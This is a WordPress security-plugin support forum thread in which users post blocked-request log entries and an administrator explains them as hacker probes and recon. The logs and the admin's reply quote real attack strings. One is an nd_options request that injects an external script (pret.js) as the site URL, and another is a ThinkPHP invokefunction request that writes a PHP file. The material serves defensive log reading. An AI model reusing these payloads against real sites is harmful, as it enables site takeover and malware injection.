Home › Forums › BulletProof Security Pro › Security Log Event Codes
Tagged: Event Codes, Security Log
- This topic has 81 replies, 17 voices, and was last updated 4 months, 1 week ago by
Chris Moon.
-
AuthorPosts
-
Bub
ParticipantDone and done…. Thanks. This topic should now be closed.
Bub
ParticipantAgain, thanks.
sergeykar
ParticipantI have been seeing this frequently in my security log – and it appears like a hack attempt – not sure what it is because I have not seen this in the past. It appears BPS is doing it’s job – however is there a weakness this attempt is trying to exploit?
[403 GET Request: 06.08.2019 - 10:15] BPS: 3.5 WP: 5.2.2 Event Code: WPADMIN-SBR Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: 159.69.154.78 Host Name: static.78.154.69.159.clients.your-server.de SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: HTTP_FORWARDED: HTTP_X_FORWARDED_FOR: HTTP_X_CLUSTER_CLIENT_IP: REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option] QUERY_STRING: nd_options_value_import_settings=siteurl[nd_options_option_value]https://jackielovedogs.com/pret.js?l=1&[nd_options_end_option] HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36
AITpro Admin
KeymasterThis is either a probe looking for existing injected hacker code in your website’s Source Code or a hacker trying to exploit an existing hack injection on your website’s Source Code. To check if your website is hacked do the steps below:
1. Go to your website’s home page.
2. Right mouse click and click View page source (google chrome) or a similar command for other Browsers.
3. Use your Browser’s Find… command (google chrome – located under settings > Find…) and enter this search string: nd_options
4. If you see/find Source Code that looks like this below then your website is hacked.
5. Let me know if your Browser Find/Search finds any search results or not.httx://expat.ca/?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=jfjvc.php&vars%5B1%5D%5B%5D=%3C?php%20mb_ereg_replace(, httx://expat.ca/jfjvc.php, httx://expat.ca/wp-admin/admin-ajax.php?nd_options_value_import_settings=siteurl[nd_options_option_value]httxs://jackielovedogs.com/pret.js?l=1&[nd_options_end_option], httx://expat.ca/wp-admin/admin-post.phpnd_options_value_import_settings=home[nd_options_option_value]httxs://jackielovedogs.com/pret?l=1&[nd_options_end_option],
Chris Moon
ParticipantFound this in my Security Log and not sure what it mens:
[403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/n.php QUERY_STRING: HTTP_USER_AGENT: Mozilla [403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/accesson.php QUERY_STRING: HTTP_USER_AGENT: Mozilla [403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/upload.php QUERY_STRING: HTTP_USER_AGENT: Mozilla [403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/thumbs.php QUERY_STRING: HTTP_USER_AGENT: Mozilla [403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/wp-file-manager/lib/files/x.php QUERY_STRING: HTTP_USER_AGENT: Mozilla [403 GET Request: September 19, 2020 - 23:57] BPS Pro: 14.8 WP: 5.5.1 Event Code: PFWR-PSBR-HPRA Solution: https://forum.ait-pro.com/forums/topic/security-log-event-codes/ REMOTE_ADDR: GDPR Compliance On Host Name: ns4.transcomag.net SERVER_PROTOCOL: HTTP/1.1 HTTP_CLIENT_IP: GDPR Compliance On HTTP_FORWARDED: GDPR Compliance On HTTP_X_FORWARDED_FOR: GDPR Compliance On HTTP_X_CLUSTER_CLIENT_IP: GDPR Compliance On REQUEST_METHOD: GET HTTP_REFERER: REQUEST_URI: /wp-content/plugins/quiz-master-next/js/admin.js QUERY_STRING: HTTP_USER_AGENT: Mozilla
AITpro Admin
Keymaster@ Chris Moon – These are typical hacker recon/searches for known plugins with security vulnerabilities. The BPS Pro Plugin Firewall protects all plugin files in the WordPress /plugins/ folder. So these recons/searches were blocked by the BPS Pro Plugin Firewall.
Chris Moon
ParticipantThanks Ed, that’s reassuring.
-
AuthorPosts
- You must be logged in to reply to this topic.